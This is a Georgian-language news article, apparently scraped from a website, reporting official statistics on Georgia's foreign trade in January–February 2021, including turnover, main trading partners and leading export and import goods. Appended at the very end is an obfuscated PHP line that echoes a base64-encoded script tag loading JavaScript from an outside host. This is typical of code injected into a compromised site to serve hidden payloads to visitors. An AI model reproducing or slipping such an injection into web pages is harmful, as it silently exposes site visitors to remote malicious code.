celsiusi
ავერსი საქკაბელი
სტატისტიკის ეროვნული სამსახურის მიერ გავრცელებული ინფორმაციის თანახმად, 2021 წლის იანვარ-თებერვალში საქართველოს უმსხვილესი სავაჭრო პარტნიორები თურქეთი, რუსეთი და ჩინეთი არიან.
 
“საქსტატის“ ინფორმაციით, 2021 წლის იანვარ-თებერვალში საქართველოში საქონლით საგარეო სავაჭრო ბრუნვამ (არადეკლარირებული ვაჭრობის გარეშე) 1 654.0 მლნ. აშშ დოლარი შეადგინა, რაც წინა წლის შესაბამის პერიოდთან შედარებით 12 პროცენტით ნაკლებია. აქედან ექსპორტი 494.7 მლნ. აშშ დოლარს შეადგენს (6.8 პროცენტით ნაკლებია), ხოლო იმპორტი 1 159.3 მლნ. აშშ დოლარს (14.1 პროცენტით ნაკლებია). საქართველოს უარყოფითმა სავაჭრო ბალანსმა, 2021 წლის იანვართებერვალში, 664.6 მლნ. აშშ დოლარი შეადგინა, რაც საგარეო სავაჭრო ბრუნვის 40.2 პროცენტია.
 
ამასთან, 2021 წლის იანვარ-თებერვალში ათი უმსხვილესი საექსპორტო ქვეყნის წილმა საქართველოს მთლიან ექსპორტში 77.2 პროცენტი შეადგინა. უმსხვილესი საექსპორტო სამეული შემდეგნაირად ჩამოყალიბდა: რუსეთი (71.1 მლნ. აშშ დოლარი), აზერბაიჯანი (66.4 მლნ. აშშ დოლარი) და ჩინეთი (53.8 მლნ. აშშ დოლარი).
 
ხოლო ათი უმსხვილესი საიმპორტო პარტნიორი ქვეყნის წილმა საქართველოს მთლიან იმპორტში 73.6 პროცენტი შეადგინა. პირველ სამეულში შედის: თურქეთი (203.3 მლნ. აშშ დოლარი), ჩინეთი (139.9 მლნ. აშშ დოლარი) და რუსეთი (131.6 მლნ. აშშ დოლარი).
 
„2021 წლის იანვარ-თებერვალში სასაქონლო ჯგუფებიდან საექსპორტო ათეულში პირველი ადგილი სპილენძის მადნებმა და კონცენტრატებმა დაიკავა 94.5 მლნ. აშშ დოლარით, რაც მთელი ექსპორტის 19.1 პროცენტს შეადგენს. მეორე ადგილს იკავებს ფეროშენადნობები 52.1 მლნ. აშშ დოლარით (მთლიანი ექსპორტის 10.5 პროცენტი), ხოლო მესამე ადგილზეა მსუბუქი ავტომობილები 50.0 მლნ. აშშ დოლარით (10.1 პროცენტი).
 
უმსხვილესი საიმპორტო სასაქონლო ჯგუფი 2021 წლის იანვარ-თებერვალში წარმოდგენილი იყო მსუბუქი ავტომობილების სახით, რომლის იმპორტმა 98.2 მლნ. აშშ დოლარი და მთელი იმპორტის 8.5 პროცენტი შეადგინა. მეორე ადგილს იკავებდა ნავთობის აირები 90.0 მლნ. აშშ დოლარით (იმპორტის 7.8 პროცენტი), ხოლო მესამე ადგილზეა ნავთობი და ნავთობპროდუქტები 83.5 მლნ. აშშ დოლარით (იმპორტის 7.2 პროცენტი)“,- აღნიშნულია „საქსტატის“ ანგარიშში.
1308
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");